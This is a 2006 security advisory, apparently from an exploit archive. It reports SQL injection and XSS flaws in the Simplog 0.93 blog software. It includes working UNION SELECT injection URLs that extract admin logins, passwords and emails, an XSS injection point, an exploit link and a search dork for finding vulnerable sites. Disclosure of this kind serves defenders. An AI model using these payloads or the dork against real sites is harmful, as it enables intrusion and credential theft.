Simplog-0.93.txt

Simplog-0.93.txt: Posted Apr 28, 2006; Authored by Mustafa Can Bjorn | Site nukedx.com; Simplog 0.93 and earlier suffer from SQL injection in preview.php, archive.php, and comments.php as well as XSS. POC included.; tags | advisory, php, sql injection; SHA-256 | a817a5016933f39da266ee3357cafffc6971069ff9d80b60ec6a498306698745; Download | Favorite | View

Simplog-0.93.txt


--Security Report--
Advisory: Simplog <= 0.93 Multiple Remote Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 21/04/06 22:13 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: Simplog (http://www.simplog.org/)
Version: 0.93 and prior versions must be affected.
About: Via this methods remote attacker can inject arbitrary SQL queries to 
tid parameter in preview.php,
cid,pid and eid in archive.php and pid in comments.php.As u know rgod was 
published advisory about version 0.92 but he
did not notice this SQL injections. He found other SQL injections on 
archive.php but did not found these vulnerabilities.
Also there is cross site scripting vulnerability in imagelist.php's imagedir 
parameter.
Level: Critical
---
How&Example: 
SQL Injection :
Needs MySQL > 4.0
GET -> http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&cid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&pid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&eid=[SQL]
EXAMPLE -> 

http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=-1/**/UNION/**/SELECT/**/
concat(25552,login,25553,password,25554)/**/from/**/blog_users/**/where/**/admin=1/*
EXAMPLE -> 

http://[victim]/[simplogdir]/archive.php?blogid=1&cid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*
EXAMPLE -> 

http://[victim]/[simplogdir]/archive.php?blogid=1&pid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*
EXAMPLE -> 

http://[victim]/[simplogdir]/archive.php?blogid=1&eid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*
EXAMPLE -> 

http://[victim]/[simplogdir]/comments.php?blogid=1&pid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*
with this examples remote attacker can leak speficied admins login 
information from database.

XSS:
GET -> 

http://[victim]/[simplogdir]/imagelist.php?blogid=1&act=add_entry&login=1&imagedir=[XSS]

---
Timeline:
* 21/04/2006: Vulnerability found.
* 21/04/2006: Contacted with vendor and waiting reply.
---
Exploit:
http://www.nukedx.com/?getxpl=25
---
Dorks: "powered by simplog"
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=25

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 64 files
Debian 22 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,175)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,140)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,480)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,022)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

Simplog-0.93.txt

Simplog-0.93.txt

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Simplog-0.93.txt

Share This

Simplog-0.93.txt

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems